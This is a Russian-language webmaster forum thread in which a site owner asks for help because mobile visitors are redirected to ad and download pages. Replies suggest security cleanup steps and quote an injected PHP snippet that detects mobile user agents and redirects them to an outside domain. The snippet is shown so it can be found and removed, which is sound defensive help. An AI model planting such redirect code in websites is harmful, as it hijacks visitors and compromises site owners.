Заражен сайт помогите
Страницы: 1 2 След.
Заражен сайт помогите
Здравствуйте. В меня такая проблема: постоянно заражаются сайты если заходить на сайт из телефона сразу перекидывает на рекламу скачать приложение и тд... хотя я рекламу даже не ставлю на сайт никакую. Сам сайт windrom.ruОбновлял движок и шаблон не помогло, помогите пожалуйста)
Позитивный человек
Цитата
Позитивчег пишет:
Здравствуйте. В меня такая проблема: постоянно заражаются сайты если заходить на сайт из телефона сразу перекидывает на рекламу скачать приложение и тд... хотя я рекламу даже не ставлю на сайт никакую. Сам сайт windrom.ruОбновлял движок и шаблон не помогло, помогите пожалуйста)
Совет: Купите хостинг хотя бы за 600 рублей в месяц, и движок платный!!!
Изменено: moretz-rf - 14 Апреля 2013 23:51
Вы скажите по сути в чем проблема именно где может скрипт залит, но я ничего не нашел
Цитата
Совет: Купите хостинг хотя бы за 600 рублей в месяц, и движок платный!!!
При чем тут вообще хостинг?? Тем более за такую баснословную цену. Или лишь бы ляпнуть что нибудь?
Автору - поищите заразу в .htaccess. Даже если у главного домена на хостинге там зараза сидит, то и дополнительные домены все будут редиректить на мобильную хрень. Потом поменяйте пароли на фтп и на хостинге
1. проверьте тщательно компы, с которых подсоединяетесь к сайту - фтп, антивирусными программами
2. Удалите из фтп клиентов все сохраненные пароли.
3. Поменяйте все фтп пароли.
4. проверьте все файлы, особенно вновь измененные и сравните с эталонными от СМС
5. Проверьте все js скрипты
6. скачайте скрипт Ай-Болит: revisium.com/ai/
7. примерно так. если шаблон шарезный или нуленая смс, то обратите внимание - вредоносное может быть зашито в них изначально.

Дополнительно по ай-болиту: revisium.com/kb/scan_site_windows.html
Изменено: Coder - 15 Апреля 2013 00:10
обновлял полностью все файлы ничего не помогает в том числе и htaccess, при заходе с тела сразу редирект на вирусняк
хостинг moyhosting.com
По  ай-болиту посмотрите еще здесь: revisium.com/kb/virusonsite.html
Айболит чет мне не помог. Больше минуты не сканирует, а файлов много и не успевал за это время. Приходилось вручную искать
Цитата
mazesk пишет:
Приходилось вручную искать
Все механизированные средства лишь дополнения к работе самого человека. Но при неприятности лучше воспользоваться всем, что имеется - больше вероятность качества.
Смотри файл dbconfig.php, index.php, init.php, enige.php и файл языков website.lng на наличе примерно такого кода:
Код
$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");
$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");
$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");
$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");

if ($iphone || $android || $palmpre || $ipod || $berry === true) { 
    header('Location: http://statuses.ws/');
Цитата
mazesk пишет:
поищите заразу в .htaccess
Редирект может быть и средствами php и js : htaccesstools.com/articles/redirection/
Да я ж не против
Цитата
fortnoxby пишет:
Смотри файл dbconfig.php, index.php, init.php, enige.php и файл языков website.lng на наличе примерно такого кода:
Код
 $iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");
$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");
$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");
$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");

if ($iphone || $android || $palmpre || $ipod || $berry === true) { 
    header('Location: http://statuses.ws/'); 
да действительно есть такое) интересно как оно туда попало?
Цитата
mazesk пишет:
Да я ж не против
Я это к тому, что лучше бы везде искать, и сразу по всем возможным направлениям.
Страницы: 1 2 След.